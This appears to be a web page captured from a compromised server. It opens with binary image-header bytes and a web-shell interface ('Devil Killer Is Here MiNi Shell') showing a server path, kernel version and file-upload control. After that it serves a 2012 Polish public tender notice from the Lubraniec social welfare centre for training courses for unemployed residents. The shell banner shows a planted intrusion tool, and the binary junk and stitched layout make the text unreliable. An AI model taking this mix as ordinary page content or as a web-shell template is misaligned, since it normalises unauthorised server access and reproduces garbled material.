JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120608/126253-N-2012.html

<p class="kh_header"><b>Lubraniec: Kompleksowe usługi szkoleniowe wraz z realizacją programów wsparcia dla osób bezrobotnych i nieaktywnych zawodowo z terenu gminy Lubraniec, korzystających ze świadczeń pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 126253 - 2012; data zamieszczenia: 08.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Brzeska 49, 87-890 Lubraniec, woj. kujawsko-pomorskie, tel. 54 2862013(17) wew. 22, faks 54 2862498.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe usługi szkoleniowe wraz z realizacją programów wsparcia dla osób bezrobotnych i nieaktywnych zawodowo z terenu gminy Lubraniec, korzystających ze świadczeń pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kompleksowych usług         szkoleniowych wraz z realizacją programów wsparcia dla osób bezrobotnych, korzystających     z pomocy społecznej z terenu gminy Lubraniec w ramach projektu Aktywna gmina Lubraniec. Program przeciw wykluczeniu społecznemu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Projekt realizowany jest             w ramach Priorytetu VII Promocja integracji społecznej, Działania 7.1. Rozwój                               i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój                                               i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 
1.	Dla 27 osób, z którymi zawarto kontrakty socjalne:

1)	Szkolenie:Trening kompetencji społecznych: 

- szkolenie grupowe
- liczba osób - 27 w podziale na 2 grupy: I grupa - 11 kobiet, 2 grupa - 16 mężczyzn
- liczba godz. szkolenia - 24 godz.: 3 dni po 8 godz., 8.00 - 16.00, pn-pt
- termin szkolenia: lipiec 2012r.
           - szkolenie na terenie gminy Lubraniec
- w cenie szkolenia: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW
 - zakres programu szkolenia: poczucie wartości/godności, budowanie postawy asertywnej; sytuacja psychologiczna osoby bezrobotnej; analiza motywacji do pracy, Moje prawa, obrona swoich praw w sytuacjach społecznych, Monolog wewnętrzny- myśli utrudniające podejmowanie aktywności; lęk związany z przyjmowaniem, wyrażaniem i reagowaniem na krytykę; asertywny styl komunikacji w kontaktach pracowniczych i w życiu osobistym; przyczyny i skutki braku akceptacji siebie; wpływ kompleksów społecznych na funkcjonowanie jednostki; radzenie sobie ze stresem; wyrażanie próśb, żądań, oczekiwań i wydawanie poleceń
Wymagania od prowadzącego trening:
- wykształcenie wyższe 
- posiadanie uprawnień psychoterapeuty i trenera umiejętności  psychologicznych i psychospołecznych
- poddawanie swojej pracy superwizji grupowej i indywidualnej (konsultowanie metod pracy i obowiązków wynikających z jej charakteru z innym specjalistą posiadającym certyfikat superwizora) 
- doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym


2)	Szkolenie: Warsztaty z doradcą zawodowym: 

- szkolenie grupowe
- liczba osób - 27 w podziale na 2 grupy: I grupa - 11 kobiet, 2 grupa - 16 mężczyzn
- liczba godz. szkolenia - 24 godz.: 3 dni po 8 godz.,8.00 - 16.00,  pn-pt
- termin szkolenia: lipiec 2012r.
- szkolenie na terenie gminy Lubraniec
- w cenie szklenia: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW
 - zakres programu szkolenia: autoprezentacja - sztuka mówienia o sobie; bilans  umiejętności zawodowych; dokumenty aplikacyjne i rozmowa kwalifikacyjna; komunikacja; przedsiębiorczość
Wymagania od prowadzącego warsztaty:
- wykształcenie wyższe kierunkowe
- posiadanie uprawnień do wykonywania zawodu doradcy zawodowego
- doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym


3)	Kurs Brukarz

- liczba osób - 1
- liczba godz. kursu: 88 godz. (w tym egzamin), 11 dni po 8 godz. dziennie, 8.00 - 16.00, pn-pt
- termin kursu: w okresie lipiec - wrzesień 2012r.
 - w cenie kursu: wyżywienie, materiały dydaktyczne, egzamin, zwrot kosztów  dojazdów, ubezpieczenie NW
- zakres programu kursu: zasady bezpieczeństwa i higieny pracy przy procesach brukarskich, materiały stosowane w brukarstwie: kruszywa mineralne, skały, spoiwa mineralne: cement i inne, technologie wykonywania nawierzchni brukowych,  narzędzia i urządzenia do robót brukarskich, wyroby z materiałów kamiennych i ich cechy techniczne, przygotowanie kursanta do pracy: instruktarz stanowiskowy, usuwanie humusu i montaż obrzeży, usypywanie podbudowy i zagęszczanie, przykłady rozwiązań technologicznych dróg i chodników, układanie kostki brukowej: rodzaje, możliwości, układanie kostki brukowej: wzory i sposoby, zagęszczanie, sprzątanie stanowiska pracy, egzamin
Wymagania od Wykonawcy:
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu


4)	Kurs Magazynier z obsługą wózków jezdniowych

 - liczba osób - 1
  - liczba godz. kursu: 96 godz., 12 dni po 8 godz. dziennie, 8.00 - 16.00,  pn-pt
  - termin kursu: w okresie sierpień - październik 2012r.
- część teoretyczna i praktyczna kursu na terenie Włocławka
- w cenie kursu: wyżywienie, materiały dydaktyczne, egzamin, zwrot kosztów dojazdów, ubezpieczenie NW
- zakres programu kursu zgodny z minimum programowym zatwierdzonym  przez Ośrodek Doskonalenia Kadr w Mysłowicach: typy stosowanych wózków jezdniowych, budowa wózka, czynności operatora przy obsłudze wózków przed podjęciem pracy, czynności kierowcy w czasie pracy wózka, wiadomości z zakresu ładunkoznawstwa, wiadomości z zakresu BHP, praktyczna nauka jazdy, bezpieczna obsługa - wymiana butli gazowych w wózkach wyposażonych w te urządzenia, wiadomości o dozorze techniczne , transport wewnątrzzakładowy - technika magazynowa, zapoznanie z dokumentacją magazynową, zapoznanie z programami komputerowymi do obsługi magazynu i sprzedaży, zapoznanie z problematyką składowania różnych rodzajów materiałów i wyrobów gotowych, wymagania dotyczące regałów, opakowań i budynków magazynowych, gospodarka magazynowa
Wymagania od Wykonawcy:
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu




5)	Kurs Operator sprzętu ciężkiego (różne specjalności)

- liczba osób - 2
- liczba godz. kursu: 158 godz. + egzamin, min. 4 godz. dziennie, pn-pt
- termin kursu: w okresie lipiec - październik 2012r.
- kurs na terenie Włocławka
- program nauczania oparty na programie nauczania opracowanym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie
- posiadanie placu manewrowego z własnym parkiem maszynowym
- certyfikaty otrzymane przez uczestników muszą nadawać uprawnienia państwowe
- w cenie kursu: wyżywienie, badanie lekarskie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW
Wymagania od Wykonawcy:
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu

6)	Kurs Spawacz
	
	- liczba osób - 1
	- liczba godz. kursu: 128 godz. (w tym 36 godz. teorii, 84 godz. praktyki, 8 godz. egzaminu), 21 dni po min 5 godz. dziennie, 8.00 - 14.00, pn-pt
	- termin kursu: w okresie lipiec - listopad 2012r.
	- kurs na terenie Włocławka
- w cenie kursu: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, badania lekarskie, ubezpieczenie NW
- zakres programu kursu: podstawy elektrotechniki, maszyny i urządzenia do spawania, materiały o spawania, technika spawania elektrodą nietopliwą w osłonie gazów obojętnych, ogólne przepisy o budowie konstrukcji spawanych, przepisy Dozoru Technicznego, materiały dodatkowe do spawania, materiałoznawstwo i obróbka cieplna, rysunek techniczny, oznaczanie spoin, kontrola połączeń spawanych, BHP i Ppoż, instruktarz wstępny, zajęcia praktyczne, egzamin
Wymagania od Wykonawcy:
- Ośrodek Certyfikowany przez Urząd Dozoru Technicznego (UDT-CERT)
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym

              7) Kurs prawa jazdy kat. B wraz z kursem przedstawiciel handlowy

- liczba osób - 15 
           - termin kursu: sierpień - listopad 2012r., 
           - w cenie kursu: wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, zwrot kosztów dojazdów, badania lekarskie, ubezpieczenie NW, jednorazowe podejście do państwowego egzaminu teoretycznego i praktycznego WORD, 
- liczba godz. kursu prawa jazdy kat. B: 60 godz. (w tym 30 godz. zajęć praktycznych na 1 osobę, 1     godz. szkolenia = 45 minut oraz 30 godz. zajęć teoretycznych na 1 osobę, 1 godz. szkolenia = 60 minut), godziny szkolenia teoretycznego : 8.00 - 16.00, maksymalnie 7 godz. dziennie, od poniedziałku do piątku, godziny szkolenia praktycznego - ustalenia indywidualne z uczestnikami szkolenia, 
             - kurs na terenie Włocławka 
             - zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz. 1834,  zm. Dz. U. z 2006r. Nr 3 poz. 24, z późn. zmianami). 
- liczba godz. kursu przedstawiciel handlowy: 
- 40 godz. ( w tym min. 16 godz. zajęć praktycznych w zakresie sprzedaży z wykorzystaniem komputera i programu CRM, w tym 1 komputera na 1 uczestnika), 5 dni po 8 godz., 8.00 - 15.00, pn-pt, 
- realizacja kursu na terenie Lubrańca, 
- zakres programu kursu: umiejętności komunikacji w pracy przedstawiciela handlowego, techniki sprzedaży w pracy przedstawiciela handlowego, standard wizyty handlowej - PERSWAZYJNY FORMAT SPRZEDAŻY, telemarketing i sprzedaż przez telefon, preferencje osobowościowe klientów i ich znaczenie w sprzedaży, trudne sytuacje, zastrzeżenia i obiekcje klientów, negocjacje w sprzedaży, przygotowanie profesjonalnych ofert handlowych, savoir vivre w pracy przedstawiciela handlowego
       Wymagania od prowadzącego kurs: 
- posiadanie uprawnień do prowadzenia szkoły nauki jazdy, 
- doświadczenie w realizacji kursów i szkoleń, 
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym.


                 8) Kurs prawa jazdy kat. C wraz z podstawowym kursem ADR


 	- liczba osób - 1 
- termin kursu: sierpień - listopad 2012r., 
 - kurs na terenie Włocławka 
- w cenie kursu: kurs podstawowy kat. C + ADR, wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, zwrot kosztów dojazdów, badania lekarskie, ubezpieczenie NW, jednorazowe podejście do państwowego egzaminu teoretycznego i praktycznego WORD, 
- liczba godz. kursu prawa jazdy kat. C: 50 godz. (w tym 30 godz. zajęć praktycznych na 1 osobę oraz 20 godz. zajęć teoretycznych na 1 osobę, godziny szkolenia teoretycznego : 8.00 - 16.00, maksymalnie 7 godz. dziennie, od poniedziałku do piątku, godziny szkolenia praktycznego - ustalenia indywidualne z uczestnikami szkolenia, 
- zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz. 1834, zm. Dz. U. z 2006r. Nr 3 poz. 24, z późn. zmianami). 
- liczba godz. kursu ADR - 24 godziny. Kurs powinien zostać przeprowadzony zgodnie z Ustawą z dnia 28 października 2002r.  o przewozie drogowym towarów niebezpiecznych (Dz. U. z 2002r. nr 199 poz. 1671 z późniejszymi zmianami). Kurs musi kończyć się egzaminem w formie 30 pytań testowych, przeprowadzonym w obecności komisji egzaminacyjnej składającej się trzech osób: przedstawiciela Urzędu Marszałkowskiego Województwa Kujawsko-Pomorskiego, przedstawiciela ośrodka szkolącego oraz wykładowcy prowadzącego kurs. 
Wymagania od prowadzącego kurs: 
- posiadanie uprawnień do prowadzenia szkoły nauki jazdy, doświadczenie w realizacji kursów i szkoleń, 
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym.




                  9) Kurs prawa jazdy kat. C + E wraz z podstawowym kursem ADR

- liczba osób - 1 
- termin kursu: sierpień - listopad 2012r.,
 - kurs na terenie Włocławka, 
- w cenie kursu: kurs podstawowy kat. C + E wraz z ADR, wyżywienie na zajęciach teoretycznych, materiały szkoleniowe, zwrot kosztów dojazdów, badania lekarskie, ubezpieczenie NW, jednorazowe podejście do państwowego egzaminu praktycznego WORD,
- liczba godz. kursu prawa jazdy kat. C + E: 45 godz. (w tym 25 godz. zajęć praktycznych oraz 20 godz. zajęć teoretycznych, godziny szkolenia teoretycznego : 8.00 - 16.00, maksymalnie 7 godz. dziennie, od poniedziałku do piątku, godziny szkolenia praktycznego - ustalenia indywidualne z uczestnikiem szkolenia, 
- zakres programu kursu zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz. 1834, zm. Dz. U. z 2006r. Nr 3 poz. 24, z późn. zmianami). 
- liczba godz. kursu ADR - 24 godziny. Kurs powinien zostać przeprowadzony zgodnie z Ustawą z dnia 28 października 2002r.  o przewozie drogowym towarów niebezpiecznych (Dz. U. z 2002r. nr 199 poz. 1671 z późniejszymi zmianami). Kurs musi kończyć się egzaminem w formie 30 pytań testowych, przeprowadzonym w obecności komisji egzaminacyjnej składającej się trzech osób: przedstawiciela Urzędu Marszałkowskiego Województwa Kujawsko-Pomorskiego, przedstawiciela ośrodka szkolącego oraz wykładowcy prowadzącego kurs. 
Wymagania od prowadzącego kurs: 
- posiadanie uprawnień do prowadzenia szkoły nauki jazdy, doświadczenie w realizacji kursów i szkoleń, 
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym.


10)  Kurs Opiekun osób starych, chorych i niepełnosprawnych

- liczba osób - 1
- liczba godz. kursu: 120 godz. (w tym min. 72 godz. zajęć praktycznych), 15 dni po 8 godz., 8.00 - 16.00, pn-pt
- termin kursu: w okresie lipiec- październik 2012r.
- kurs na terenie Włocławka 
- całość kursu musi odbywać się na terenie Domu Pomocy Społecznej
- w cenie kursu: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW
- zakres programu kursu: ogólna charakterystyka starości jako fazy w cyklu życia człowieka, fizyczne objawy starzenia się organizmu człowieka, psychiczne objawy starzenia się człowieka, konsekwencje demograficzne, ekonomiczne oraz społeczne starzenia się społeczeństwa, polityka społeczna wobec starości i ludzi starych w Polsce, potrzeby ludzi starych w polityce społecznej, wybrane elementy zabezpieczenia społecznego (pomoc społeczna, opieka zdrowotna, rehabilitacja), DPS dla ludzi w podeszłym, integracja DPS z lokalną społecznością, dom dziennego pobytu jako półstacjonarna forma pomocy społecznej dla osób w podeszłym wieku, kategoria jakości życia w kontekście osób starych, realizacja idei wolności i prawa do godnego życia w DPS dla osób w podeszłym wieku, adaptacja ludzi starszych do życia w DPS, przestrzeń życiowa ludzi starszych -  mieszkańców dps, aktywizacja starszych wiekiem mieszkańców DPS, pomoc mieszkańcom z otępieniem starczym, wartości duchowe w procesach opieki i wsparcia ludzi starych, seksualność ludzi starszych, determinanty jakości życia seniorów w DPS, rehabilitacja geriatryczna, zjawisko depresji u seniorów, współpraca DPS z rodziną mieszkańca, pielęgniarstwo geriatryczne, samotności osamotnienie osób w podeszłym wieku, przejawy patologii społecznych wśród osób starych (alkoholizm, nikotynizm, agresja), zakres czynności personelu w DPS, wolontariat w DPS, praca socjalna w systemie pomocy społecznej i jej wartości, formy pomocy ludziom starszym, cukrzyca - sposoby leczenia, rola samokontroli w leczeniu, pomoc mieszkańcom DPS przy sprowadzaniu na posiłek, karmienie osób niepełnosprawnych, techniki radzenia sobie w sytuacjach trudnych, rozpoznawanie źródeł stresu, zakłócenia w procesie komunikacji, problemy pielęgnacyjne osób przewlekle chorych i niepełnosprawnych jako przygotowanie do opieki nad osobami starszymi, ocena poziomu aktywności i możliwości psychofizycznych podopiecznego, pomoc przy spożywaniu posiłku, organizacja bezpiecznego otoczenia osób niepełnosprawnych, profilaktyka i leczenie uszkodzeń skóry (odleżyny, oparzenia), nadciśnienie tętnicze, nauka prawidłowego pomiaru ciśnienia krwi, proces pielęgnowania pacjentów w fazie terminalnej (walka z bólem), zapewnienie odpowiedniej higieny osobistej z poszanowaniem godności osobistej, zaburzenia psychiczne wieku podeszłego, zaburzenia nastroju, zapobieganie powikłaniom wynikającym z długotrwałego unieruchomienia (metody i techniki usprawnienia fizycznego chorych), różnorodne formy aktywizacji podopiecznych, ćwiczenia oddechowe oraz ogólnousprawniające w ramach gimnastyki przyłóżkowej, nauka samoobsługi i samopielęgnacji, stosowanie metod relaksacyjnych przy pracy z podopiecznym, postępowanie w stanach zagrożenia życia, komunikowanie się z osobami cierpiącymi na zaburzenia mowy, słuchu, wzroku, nauka samoobsługi jako zapobieganie pogłębianiu się niepełnosprawności, osamotnienia i bezradności, udar mózgu - pielęgnacje poudarowe, rola rehabilitacji, znaczenie dotyku we wzajemnych relacjach opiekuna i podopiecznego, problem nietrzymania moczu (ochrona skóry, środki pomocnicze i pielęgnacyjne do higieny osobistej), porady dietetyczne, rodzaje diet, zagrożenia u osób przewlekle chorych (upadki i zapobieganie im).
Wymagania od Wykonawcy:
- osoby prowadzące kurs: prowadzący zajęcia teoretyczne: wykształcenie wyższe w zakresie pokrewnym z kursem, organizator pomocy społecznej, doświadczenie zawodowe na stanowisku wykładowcy/nauczyciela/trenera/instruktora w zakresie prowadzenia zajęć, doświadczenie w pracy z osobami starymi, chorymi i niepełnosprawnymi; prowadzący zajęcia praktyczne: wykształcenie wyższe - co najmniej licencjat pielęgniarstwa, ukończony kurs kwalifikacyjny Opieki Długoterminowej dla Pielęgniarek, doświadczenie w pracy z osobami starymi, chorymi i niepełnosprawnymi
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym.


11)	Kurs kucharz 

- liczba osób - 2 
- liczba godz. kursu: 120 godz. (w tym 60 godz. zajęć praktycznych i 60 godz. teoretycznych), 15 dni po 8 godz., 8.00 - 16.00, pn-pt 
- termin kursu: w okresie lipiec - wrzesień 2012r 
- kurs na terenie Włocławka, 
- w cenie kursu: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW, 
- zakres programu kursu: przygotowanie do samodzielnej pracy na stanowisku kucharza i kelnera, zaznajomienie z podstawową wiedzą z zakresu zagadnień technologicznych, zaznajomienie z zasadami BHP i zagrożeniami wynikającymi z ich nieprzestrzegania, profesjonalnej obsługi konsumenta, sporządzanie jadłospisów, przygotowywania i przechowywania potraw oraz sposobów ich podawania. 
Wymagania od prowadzącego kurs :
 - doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu, 
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym. 



                12) Kurs walec drogowy

- liczba osób - 1, 
- liczba godz. kursu: 166 godz. w tym egzamin;
- termin kursu: w okresie lipiec - październik 2012r., 
- kurs na terenie Włocławka 
- w cenie kursu: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, badanie lekarskie, ubezpieczenie NW, 
- zakres programu kursu: zajęcia dydaktyczne o następującej tematyce: użytkowanie eksploatacyjne, dokumentacja techniczna, BHP, podstawy elektroniki, silniki spalinowe, elementy hydrauliki, technologia robót, budowa maszyn. 
Program nauczania oparty na programie nauczania opracowanym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
- certyfikaty otrzymane przez uczestników muszą nadawać uprawnienia państwowe
Wymagania od Wykonawcy: 
- doświadczenie w realizacji kursów i szkoleń, w tym w zakresie niniejszego kursu 
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym .


2.	Dla 8 osób, z którymi zawarto umowy o udzielenie wsparcia w ramach Programu Aktywności Lokalnej:

               1) kurs GOSPODYNI: 

- liczba osób - 8, 
- liczba godz. szkolenia: 64 godz.: 8 dni po 8 godz., 8.00 - 16.00, pn-pt 
- termin kursu: w okresie lipiec - sierpień 2011r 
- szkolenie na terenie gminy Lubraniec, 
- w cenie: wyżywienie, materiały szkoleniowe, zwrot kosztów dojazdów, ubezpieczenie NW 
- zakres programu kursu: podstawowe przepisy z zakresu BHP w gastronomii i gospodarstwie domowym, racjonalne żywienie, przechowywanie surowców i potraw, składanie serwetek płóciennych, składanie i rozkładanie obrusów, ustawianie stołów, podstawowe oraz rozszerzone nakrycie, obróbka wstępna i cieplna surowców, charakterystyka i zastosowanie w produkcji kulinarnej warzyw, ziemniaków, grzybów i owoców. Zajęcia praktyczne: przygotowywanie zup, potraw mięsnych, potraw mącznych, surówek, przystawek, zakąsek, sałatek, ciast i deserów. 
Wymagania od prowadzącego kurs: 
- doświadczenie kierunkowe związane z tematyką kursu


                 2) Warsztaty zarządzania budżetem domowym
                           
- liczba osób - 8 
- liczba godz. szkolenia: 8 godz., 
- termin warsztatów: sierpień 2012r,              
- warsztaty na terenie gminy Lubraniec, 
- w cenie: wyżywienie, materiały dydaktyczne, zwrot kosztów dojazdów, ubezpieczenie NW, 
- zakres programu warsztatów: zarządzanie budżetem w gospodarstwie domowym, planowanie i monitorowanie potrzeb, planowanie i bilansowanie budżetu rodziny, efektywne sposoby oszczędzania na wydatkach domowych, jak ograniczyć wydatki niekonieczne, gospodarowanie niewielkimi i małymi pieniędzmi, jak radzić sobie w trudnych sytuacjach finansowych. 
Wymagania od prowadzącego warsztaty: 
- doświadczenie w realizacji szkoleń, w tym w zakresie niniejszego szkolenia
            - doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym. 


                  3) Warsztaty rękodzieła

- liczba osób - 8 
- liczba godzin - 18 godz., 
- termin warsztatów: w okresie sierpień - wrzesień 2012r., 
- warsztaty na terenie gminy Lubraniec,
            - w cenie: wyżywienie, zwrot kosztów dojazdów, ubezpieczenie NW, 
  	- zakres programu warsztatów: nauka wykonywania biżuterii, ozdób, przedmiotów codziennego użytku za pomocą technik rękodzielniczych. 
Wymagania od prowadzącego warsztaty:
 - doświadczenie w realizacji warsztatów rękodzielniczych,
             - doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym.

                  4)	 Warsztaty interpersonalne z elementami wizażu

- liczba osób - 8 
- liczba godzin - 18 godz., 
- termin warsztatów: w okresie sierpień - wrzesień 2012r., 
- warsztaty na terenie gminy Lubraniec, 
- w cenie: wyżywienie, materiały dydaktyczne,  zwrot kosztów dojazdu, ubezpieczenie NW, 
- zakres programu warsztatów: komunikacja interpersonalna, asertywność, stres, konstruktywna krytyka, automotywacja i poczucie własnej wartości, umiejętności słuchania innych i wyrażania własnych opinii, elementy wizażu. 
Wymagania od prowadzącego:
 - doświadczenie w realizacji niniejszych warsztatów,  
- doświadczenie w pracy z osobami bezrobotnymi zagrożonymi wykluczeniem społecznym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

